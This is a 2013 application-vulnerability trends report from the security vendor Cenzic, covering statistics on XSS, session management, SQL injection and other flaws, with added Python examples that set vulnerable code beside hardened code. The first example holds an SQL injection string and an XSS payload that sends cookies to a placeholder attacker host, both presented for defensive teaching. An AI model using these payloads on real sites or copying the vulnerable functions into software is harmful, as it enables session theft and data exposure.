Application Vulnerability Trends Report : 2013

Table of Contents

Introduction (page 3)
99% of Tested Applications Have Vulnerabilities (page 4)
Cross Site Scripting Tops a Long List of Vulnerabilities Detected in 2012 (page 5)
Vulnerability Population Trends for 2013 (page 6)
Session Management Vulnerabilities Appear in 80% of Applications (page 7)
Mobile Vulnerabilities for 2013 (page 8)
Common, Preventable Application Vulnerabilities (page 8)
Common, Detectable Application Vulnerabilities (page 9)
Conclusion (page 10)
About Cenzic (page 10)

Introduction

In 2013 it is hard to find an organization that is not routinely sharing sensitive information with customers, suppliers and employees through Internet and intranet web applications. The business benefits are clear, and the use of web-based applications continues to grow across the board. Many organizations are extending this trend to new cloud and mobile infrastructures, allowing even more sensitive data to live outside their private networks.

While the benefits of web applications are clear, the risks to your organization, brand, applications and data are more apparent than ever. Every day brings new reports of highly organized cyber attacks on leading websites. High-profile victims such as The New York Times, Bank of America and the US Federal Reserve have acknowledged breaches of their systems resulting in theft, espionage and service interruption. What is less clear is how many companies in total have been breached, including those that remain unaware that their systems are compromised. The cost of cybercrime is immense, with some analysts reporting economic losses as high as $1 trillion per year. The toll on IT and security teams after a breach is also significant, as there is a rush to remediate the damage.

As you read this report, ask important questions about your organization's security and risk profile. Are you aware of the security testing process applied to your portfolio of web applications? Do you know what vulnerabilities each of these applications has? What level of risk from application insecurity is acceptable to your business?

This paper, based on data collected by the Cenzic Managed Security team, shares details about the kind, frequency and severity of vulnerabilities found in production applications, as a guide to what will be found in 2013. Please use this document to understand the current vulnerability and risk landscape, and, more importantly, as motivation to improve the security posture of your currently deployed applications and your security practices into the future.

99% of Tested Applications Have Vulnerabilities

First and foremost, 99% of all applications tested in 2012 had one or more serious security vulnerabilities, and the median number of vulnerabilities per application was 13. It is no wonder that application-level attacks are a focus for attackers. These facts are a warning to all information security and application development personnel: most applications, including yours, are vulnerable to attack. Many of these vulnerabilities are easy to exploit, and vulnerabilities translate into risk to your organization, brand, applications and data.

But there is good news. Many of these vulnerabilities are also relatively easy for application security teams to detect, block and fix during every phase of the application life cycle. Technologies and processes for reducing application vulnerabilities include secure coding standards, vulnerability scanning, web application firewalls and intrusion detection, among others. The best results come from a multi-layered and coordinated approach that includes technology, processes, employees and a security-oriented corporate culture.

The time to act is now, before the risk of an attack turns into a breach. Real breaches can cost your business millions of dollars in material losses, remediation expense and loss of goodwill with customers. The changes required to improve your risk profile are possible with currently available security tools and your existing engineers. While the worldwide shortage of experienced web development engineers may slow the development of new applications, it is no excuse for exposing your organization to excessive security risk by releasing applications with major vulnerabilities.

Figure 1: 2011-2012 Summary Statistics: Application Vulnerabilities
Percentage of tested apps with vulnerabilities: 99% (2011), 99% (2012)
Median number of vulnerabilities per app: 16 (2011), 13 (2012)

Cross Site Scripting Tops a Long List of Vulnerabilities Detected in 2012

At 26% of the total, Cross Site Scripting (XSS) was the most frequently found vulnerability in applications tested in 2012. Surprisingly, XSS vulnerabilities rose significantly in 2012 over 2011. Many XSS vulnerabilities are severe, and many tested applications have multiple XSS exposure points to remediate.

Information Leakage and Session Management errors follow in frequency, each at 16% of total vulnerabilities found. Authentication and Authorization (13%), Cross Site Request Forgery (CSRF) (8%), SQL Injection (6%), Web Server Version (5%), Remote Code Execution (5%), Web Server Configuration (3%) and Unauthorized Directory Access (2%) round out the 2012 vulnerability population. While XSS leads the list in frequency of occurrence, security professionals are responsible for all vulnerabilities in their application portfolios.

Figure 2: 2012 Web Application Security Vulnerability Population (percentages as listed above)

Vulnerability Population Trends for 2013

In addition to being the largest population of vulnerabilities, XSS is on the rise: the 2012 level of 26% is up significantly from the 2011 level of 17% of detected vulnerabilities.

Figure 3: 2011 vs. 2012 Vulnerability Population Trend

Figure 3 shows that five categories of vulnerabilities declined in 2012, while five increased. While these trends are modestly good news, it is important to remember that vulnerabilities still exist across all categories, in legacy applications and new applications alike, and emerging cloud and mobile applications increase the complexity of your security efforts. Moreover, the threats from these vulnerabilities continue to evolve as bad actors experiment with new and different attack strategies.

The above analysis is from the perspective of vulnerability population: every vulnerability found during testing was added to the totals, so if an XSS error is found 20 times in a single application, all 20 count toward the total. This analysis is instructive of the distribution of vulnerabilities in aggregate, but keep in mind that applications with large numbers of similar vulnerabilities are common. The next section analyzes the vulnerability data from the perspective of application population, providing visibility into the range of vulnerabilities within an application.

Session Management Vulnerabilities Appear in 80% of Applications

As mentioned earlier in this report, 99% of applications have one or more vulnerabilities, and the median number of vulnerabilities per tested application is 13. The breakdown below counts, for each vulnerability class, the percentage of tested applications in which that class was found at least once.

Figure 4: 2011 vs. 2012 Application Vulnerability Class Trend

Figure 4 shows that Session Management vulnerabilities were detected in 80% of applications tested in 2012, more than any other application vulnerability class. XSS vulnerabilities appear in 61% of applications, followed by Authentication and Authorization (45%), Web Server Configuration (28%), CSRF (22%), Information Leakage (17%), SQL Injection (16%), Web Server Version (10%), Unauthorized Directory Access (8%) and Remote Code Execution (3%). The numbers do not add up to 100% because each application can have vulnerabilities in multiple classes.

The top conclusion from the application analysis matches the conclusion from the vulnerability population analysis in the previous section: application vulnerabilities are common. The application analysis shows that vulnerabilities are not limited to a few poorly designed applications; they exist in most applications. Both analyses demonstrate that application vulnerabilities are broad in scope and large in number.

In this per-application view, all vulnerability classes except SQL Injection declined in 2012, suggesting that application teams may be improving their security practices. The increase in detection of SQL Injection vulnerabilities, however, may be due to improvements in the detection tools more than to new deficiencies in security practices.

Mobile Vulnerabilities for 2013

As mobile handsets, and especially smart phones and tablets, proliferate, tracking their vulnerabilities becomes critical. The Cenzic Managed Services team discovered the following vulnerabilities during 2012.

Figure 5: 2012 Mobile Application Vulnerability Population

Mobile developers need to pay extra attention to how data is transferred to and stored on mobile devices, as Input Validation (21%), Session Management (11%) and Privacy Violation (25%) combine to account for 57% of mobile vulnerabilities. Storing unencrypted sensitive data on often-lost mobile devices is a significant cause for concern, but the often-unsecured web services behind mobile applications can pose an even bigger risk.

Common, Preventable Application Vulnerabilities

It is important for application developers and administrators to have a thorough knowledge of the common application attacks, the tools available for detecting vulnerabilities and the procedures for fixing applications. Web application security scanning technology is effective at detecting most classes of vulnerabilities. Scanning applications during the development phase of the application lifecycle ensures your development team is following best practices and helps reduce the cost of corrections. Scanning applications in production is important to ensure that secure applications stay protected against new threats, and is often the only practical way of scanning all applications cost-effectively on a sufficiently regular basis. Cenzic offers a range of solutions to help organizations identify security issues in all phases of the application lifecycle.

Most solutions for blocking and fixing application security vulnerabilities fall into one or more of three categories.

Coding Practices are the techniques application developers use to deflect potential security breaches. Consistent, high-quality coding practices are the most effective deterrent to attacks.

Web Application Firewalls (WAFs) enable policy-based blocking of attacks against specific vulnerabilities that exist in applications, without rewriting application code. A WAF is a particularly effective method for rapidly blocking a vulnerability found in a production application without a full re-release of that application; the underlying code defect remains and should still be fixed.

Server Configuration is the range of practices for managing the server hardware, operating systems and security certifications on the devices running the application.

Finally, all of these practices are most effective when they are part of an enterprise-wide security governance policy.

Common, Detectable Application Vulnerabilities

Cross Site Scripting (XSS)
Description: An application reflects or stores attacker-supplied script and delivers it to other users' browsers from an otherwise trusted URL, where it runs with that site's privileges.
Block/Fix: coding standards, web application firewall

Information Leakage
Description: An application inappropriately discloses sensitive data, such as technical details of the application or environment, or user-specific data.
Block/Fix: coding standards, web application firewall

Session Management
Description: An application inappropriately allows attackers to interject themselves as valid website users, for example through predictable, fixated or never-expiring session identifiers.
Block/Fix: coding standards

Authentication & Authorization
Description: An application does not ensure unbreachable and unreplayable authentication, and/or does not properly enforce authorized access to data and capabilities on the server side. This includes enforcing encrypted communication of credentials, password standards, and access control lists for features and data.
Block/Fix: server configuration, coding standards

Cross Site Request Forgery (CSRF)
Description: A vulnerability that allows attackers to send pre-authenticated but unauthorized commands using credentials (typically the victim's session cookie) that the application trusts.
Block/Fix: coding practices, web application firewall

SQL Injection
Description: An attacker uses various techniques to inject SQL commands and access information that should be inaccessible, such as application data, table structure and error messages. SQL injection can also cause data destruction, planting of malicious data and infrastructure information leakage.
Block/Fix: coding standards, web application firewall

Web Server Version
Description: Attackers exploit applications, servers and databases through unpatched older versions of server software with known security issues.
Block/Fix: server configuration

Remote Code Execution
Description: An application allows arbitrary commands to execute on the vulnerable device. Successful exploitation gives the attacker the privileges of the account the vulnerable process runs as; depending on those privileges, an attacker could install programs; view, change or delete data; or create new accounts with full user rights.
Block/Fix: coding practices, server configuration

Web Server Configuration
Description: Attackers exploit misconfigured servers or gain access to server configuration files, enabling further, more sophisticated attacks.
Block/Fix: server configuration

Unauthorized Directory Access
Description: Access to directory listings should be restricted. Unsecured directories can be traversed, accessed and viewed by an attacker, who may be able to access or view the contents of files.
Block/Fix: server configuration
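The XSS and SQL Injection rows above describe the defect and name coding standards as the fix without showing what the defect looks like in code. The following Python script is an added example, not Cenzic's code or part of the original report: it puts the vulnerable form of each beside its hardened form. The in-memory SQLite user table, its two rows and the two attack strings are constructed for the demonstration.

```python
"""Vulnerable and hardened handling of untrusted input for two classes in the
table: Cross Site Scripting and SQL Injection (added example, not Cenzic's code).

The in-memory user table, its rows and the attack strings are constructed here
for the demonstration."""
import html
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed sample data: two users with per-user secrets."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "alice-secret"), ("bob", "bob-secret")])
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> List[Tuple[str, str]]:
    """Builds the statement by concatenation: a quote in the input ends the
    string literal and the rest of the input is parsed as SQL."""
    sql = "SELECT name, secret FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_fixed(conn: sqlite3.Connection, name: str) -> List[Tuple[str, str]]:
    """Parameterized statement: the value travels separately from the SQL text,
    so quotes and keywords in it are matched as data, never parsed as syntax."""
    return conn.execute(
        "SELECT name, secret FROM users WHERE name = ?", (name,)
    ).fetchall()


def greet_vulnerable(name: str) -> str:
    """Reflects the request parameter into the page unencoded (reflected XSS)."""
    return "<p>Welcome, " + name + "</p>"


def greet_fixed(name: str) -> str:
    """Encodes <, >, &, ' and " so the value can only render as text in an HTML
    body or quoted attribute; script, URL and CSS contexts need their own encoder."""
    return "<p>Welcome, " + html.escape(name, quote=True) + "</p>"


# Constructed attack inputs (attacker.example is a placeholder host).
SQLI_PAYLOAD = "x' OR '1'='1"
XSS_PAYLOAD = "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>"

if __name__ == "__main__":
    conn = make_db()
    print(lookup_vulnerable(conn, SQLI_PAYLOAD))  # both rows: the WHERE clause is always true
    print(lookup_fixed(conn, SQLI_PAYLOAD))       # []: no user is literally named that
    print(greet_vulnerable(XSS_PAYLOAD))          # script tag reaches the browser intact
    print(greet_fixed(XSS_PAYLOAD))               # &lt;script&gt;... renders as text
```

Run as a script, the concatenated query returns both rows for the `x' OR '1'='1` input while the parameterized query returns none, and the encoded greeting reaches the browser as text rather than markup. html.escape covers the HTML body and quoted-attribute contexts only; a value placed inside a script block, a URL or a CSS property needs the encoding for that context, which is exactly the kind of detail a coding standard has to spell out.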
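Session Management is the class found in the most applications (80%), and the table assigns it to coding standards alone. The following Python module is an added example, not Cenzic's code or part of the original report: one concrete set of session and CSRF token rules covering the Session Management, Authentication & Authorization and CSRF rows. The in-memory session store, the 30-minute idle limit, the cookie attribute set and the HMAC-bound token pattern are choices made for this example, not practices the report prescribes.

```python
"""Session identifier and CSRF token handling (added example, not Cenzic's code).

Assumptions for the demo: sessions live in an in-memory dict, idle sessions
expire after 30 minutes, and the CSRF token is an HMAC bound to the session."""
import hashlib
import hmac
import secrets
import time
from typing import Dict, Optional

IDLE_TIMEOUT = 30 * 60            # assumed idle limit, in seconds
_sessions: Dict[str, dict] = {}   # session id -> record; a real app uses a server-side store


def _now(now: Optional[float]) -> float:
    return time.time() if now is None else now


def new_session(user: str, now: Optional[float] = None) -> str:
    """Session id: 128 bits from the OS CSPRNG, never derived from the user id,
    the clock or a counter, so it cannot be guessed or enumerated."""
    sid = secrets.token_urlsafe(16)
    _sessions[sid] = {
        "user": user,
        "last_seen": _now(now),
        "csrf_key": secrets.token_bytes(32),   # per-session key for the CSRF token
    }
    return sid


def login(user: str, old_sid: Optional[str] = None, now: Optional[float] = None) -> str:
    """Issue a fresh id on authentication and discard the pre-login one, so an id
    an attacker planted in the victim's browser (session fixation) is worthless."""
    if old_sid in _sessions:
        del _sessions[old_sid]
    return new_session(user, now)


def resolve(sid: str, now: Optional[float] = None) -> Optional[str]:
    """Map a presented id to its user, expiring idle sessions on the server side
    rather than trusting the browser to forget the cookie."""
    now = _now(now)
    rec = _sessions.get(sid)
    if rec is None:
        return None
    if now - rec["last_seen"] > IDLE_TIMEOUT:
        del _sessions[sid]
        return None
    rec["last_seen"] = now
    return rec["user"]


def logout(sid: str) -> None:
    """Invalidate on the server; clearing the cookie alone leaves the id usable."""
    _sessions.pop(sid, None)


def csrf_token(sid: str) -> str:
    """Token the application embeds in its own forms: an HMAC of the session id
    under the session's secret key. A cross-site page can make the browser send
    the session cookie, but it cannot read or compute this value."""
    return hmac.new(_sessions[sid]["csrf_key"], sid.encode(), hashlib.sha256).hexdigest()


def verify_csrf(sid: str, token: str) -> bool:
    """Reject unknown sessions, then compare in constant time."""
    if sid not in _sessions:
        return False
    return hmac.compare_digest(csrf_token(sid), token)


def set_cookie_header(sid: str) -> str:
    """Cookie attributes: Secure keeps the id off cleartext HTTP, HttpOnly keeps it
    away from injected script, SameSite=Lax stops most cross-site submissions."""
    return f"Set-Cookie: session={sid}; Secure; HttpOnly; SameSite=Lax; Path=/"


if __name__ == "__main__":
    planted = new_session("anonymous")        # id an attacker could have fixated
    sid = login("alice", planted)
    assert resolve(planted) is None and resolve(sid) == "alice"
    token = csrf_token(sid)
    assert verify_csrf(sid, token) and not verify_csrf(sid, "0" * 64)
    print(set_cookie_header(sid))
    logout(sid)
    assert resolve(sid) is None
```

Each function maps to one failure the scanner would report under these classes: a guessable or fixated identifier, a session that never expires or survives logout, a CSRF check that a cross-site form can satisfy, or a session cookie sent over cleartext or readable by injected script. The same rules apply to the web services behind mobile applications mentioned in the previous section, where the token is usually carried in a header rather than a form field.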

Conclusion

Judging from the vulnerabilities found through Cenzic's testing of enterprise-class web and mobile applications, more needs to be done in 2013 to reduce application vulnerabilities, security risk and the specter of successful attacks. While the majority of companies have the important security building blocks for their infrastructure, such as firewalls and intrusion prevention systems, not enough organizations have comprehensive practices in place for securing applications. The result is that bad actors are increasingly focusing on, and succeeding with, application-level attacks.

Finally, threats and vulnerabilities change over time. Security is a process, not a once-and-done event. Anticipate future vulnerabilities by planning to re-scan production applications frequently.

About Cenzic

Cenzic provides the leading application security intelligence platform to continuously assess Cloud, Mobile and Web applications to reduce online security risk. Cenzic's solutions scale from single applications to enterprise-level deployments with hybrid approaches that enable testing of applications at optimal levels. Cenzic helps brands of all sizes protect their reputation and manage security risk in the face of malicious attacks. Cenzic's solutions are used in all parts of the software development lifecycle, and most importantly in production, to protect against new threats even after the application has been deployed. Cenzic's application security intelligence platform is architected to handle web, cloud and mobile applications and is the first to provide risk reduction recommendations for business, application developers and specific applications. Today, Cenzic secures more than half a million online applications and trillions of dollars of commerce for Fortune 1000 companies, all major security companies, government agencies, universities and SMBs. www.cenzic.com